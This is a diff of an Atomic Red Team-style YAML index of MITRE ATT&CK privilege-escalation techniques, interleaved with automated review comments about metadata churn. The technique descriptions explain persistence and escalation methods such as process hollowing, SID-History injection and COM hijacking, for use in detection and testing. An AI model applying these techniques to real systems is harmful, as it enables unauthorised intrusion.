- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
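Review bot: the Leitch Hollowing reference now points at a third-party mirror (new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf) instead of the original autosectools.com host, with a fresh Retrieved September 12, 2024 date. Unlike the Microsoft Run Key reference earlier in the patch, which moves to the publisher's own learn.microsoft.com location, this one changes to an unaffiliated host, so confirm the mirrored PDF is the same paper before shipping.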
@@ -37701,7 +38007,7 @@ privilege-escalation:
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -37764,11 +38070,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -37821,8 +38126,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -37870,7 +38175,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests:
- name: Persistence with Custom AutodialDLL
@@ -38086,73 +38390,7 @@ privilege-escalation:
elevation_required: true
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
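Review bot: almost all of the churn in this T1546.004 hunk is key-order noise rather than a content change: every external reference is deleted here and re-emitted later in the same object with `url` and `description` swapped (compare the removed `Linux manual bash invocation` entry, `url` first, with its re-added copy, `description` first). Have the generator dump keys in a stable order so the real changes to this object (the `modified` bump to 2024-09-25, the new contributors, the two new sources and the spec version bump) are reviewable on their own.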
@@ -38200,6 +38438,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -38210,9 +38452,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -38221,8 +38467,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
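Review bot: `spec_version: '2.1'` is dropped from T1546.004 here, and the same deletion is repeated for every object in this diff; the STIX 2.1 required property disappears while `x_mitre_attack_spec_version` is bumped to 3.2.0 only for this object and simply deleted for several others. If anything downstream validates these objects as STIX or branches on the spec version, state the intended schema in the commit message. Also, two sources are new in the re-emitted list, `bencane blog bashrc` and `intezer-kaiji-malware`; the description and detection text that would cite them is not in this view, so confirm the corresponding `(Citation: ...)` markers exist, otherwise the entries are dead weight.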
@@ -38268,7 +38573,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
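Review bot: the `modified` timestamp for T1134.005 goes backwards, from `2022-04-25T14:00:00.188Z` to `2021-02-09T15:49:58.414Z`, and the same backward move recurs in most later hunks (T1548.004, T1547.002, T1546.015, T1574.009, T1037.005, T1037.003, T1546.010, T1543.001, T1055.009, T1134, T1055.005, T1547.007, T1574.002, T1055.008, T1037.001). The old values all share the synthetic `14:00:00.188Z` or `14:49:39.188Z` time of day, so this reads as a switch from release-stamped to per-object timestamps in the source bundle rather than a real regression, but the commit message should name the ATT&CK bundle version the index was regenerated from so that reviewers can account for the older dates.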
@@ -38293,8 +38598,6 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests:
- name: Injection SID-History with mimikatz
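Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1134.005 with no replacement visible in this hunk, unlike T1546.004 where it is re-emitted as 3.2.0. The same bare deletion appears for T1037.003, T1055.009, T1055.005, T1055.008 and T1037.001 further down. Confirm the field is written elsewhere in those objects, or accept that they now carry no attack spec version at all; either way the inconsistency between objects should be explained.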
@@ -38347,7 +38650,7 @@ privilege-escalation:
'
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -38427,7 +38730,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -38463,7 +38765,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
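Review bot: not introduced by this change, but visible in the context lines: the T1547.002 description splits `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\`, `"Authentication Packages"=<target binary>` and the trailing `.` onto separate lines, which is what happens when the generator strips upstream `<code>` markup and leaves a newline in its place. Inside a literal block scalar those newlines survive into the rendered text mid-sentence (the T1547.007 description with `com.apple.loginwindow.[UUID].plist` and `~/Library/Preferences/ByHost` shows the same pattern). Worth a follow-up in the generator to replace the tags with inline backticks instead of line breaks.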
@@ -38486,7 +38788,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests:
- name: Authentication Package
@@ -38509,7 +38810,7 @@ privilege-escalation:
elevation_required: true
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -38587,7 +38888,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests:
- name: COM Hijacking - InprocServer32
@@ -38730,7 +39030,7 @@ privilege-escalation:
name: powershell
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -38791,7 +39091,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests:
- name: Execution of program.exe as service with unquoted service path
@@ -38863,7 +39162,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -38885,7 +39184,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -38966,7 +39264,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -38989,7 +39286,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -39019,12 +39316,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -39109,7 +39404,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests:
- name: Install AppInit Shim
@@ -39233,7 +39527,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
@@ -39342,7 +39635,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -39370,7 +39663,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -39401,7 +39693,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -39444,12 +39736,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -39466,7 +39756,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
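Review bot: the T1546.016 contributor entry changes from `Alexander Rodchenko` to `Rodchenko Aleksandr`, surname first and a different transliteration. If that string is verbatim from the upstream bundle it is fine, but it should be checked against the source rather than merged as an incidental diff, since a changed contributor string is the kind of thing a regenerate-and-commit workflow would otherwise silently propagate.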
@@ -39525,7 +39815,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -39607,12 +39896,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -39709,7 +39997,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -39823,7 +40110,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -39893,7 +40179,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -39921,7 +40206,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -39965,8 +40250,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -40002,7 +40285,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -40021,12 +40304,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -40076,7 +40358,6 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -40195,7 +40476,7 @@ privilege-escalation:
elevation_required: true
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -40228,9 +40509,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
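Review bot: the single entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into two, and only `Nilesh Dherange (Gurucul)` keeps the affiliation while `Naveen Vijayaraghavan` loses it. If both contributors are from Gurucul the split dropped information; confirm against the upstream contributor list. Note also that the two new entries are appended after `Arad Inbar, Fidelis Security` rather than in the original position, so the list order no longer reflects the original attribution order.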
@@ -40247,9 +40529,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
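Review bot: replacing the `Office 365` and `Google Workspace` platforms with `Office Suite` changes which per-platform index files T1098.002 belongs to; the Google Workspace and Office 365 indexes should either drop this technique or list it under the new platform name, depending on how the index generator maps platform strings, so verify the regenerated CSV and Markdown indexes agree with this object. The `x_mitre_version` bump from 2.1 to 2.2 is consistent with a platform-only change.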
@@ -40295,38 +40576,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
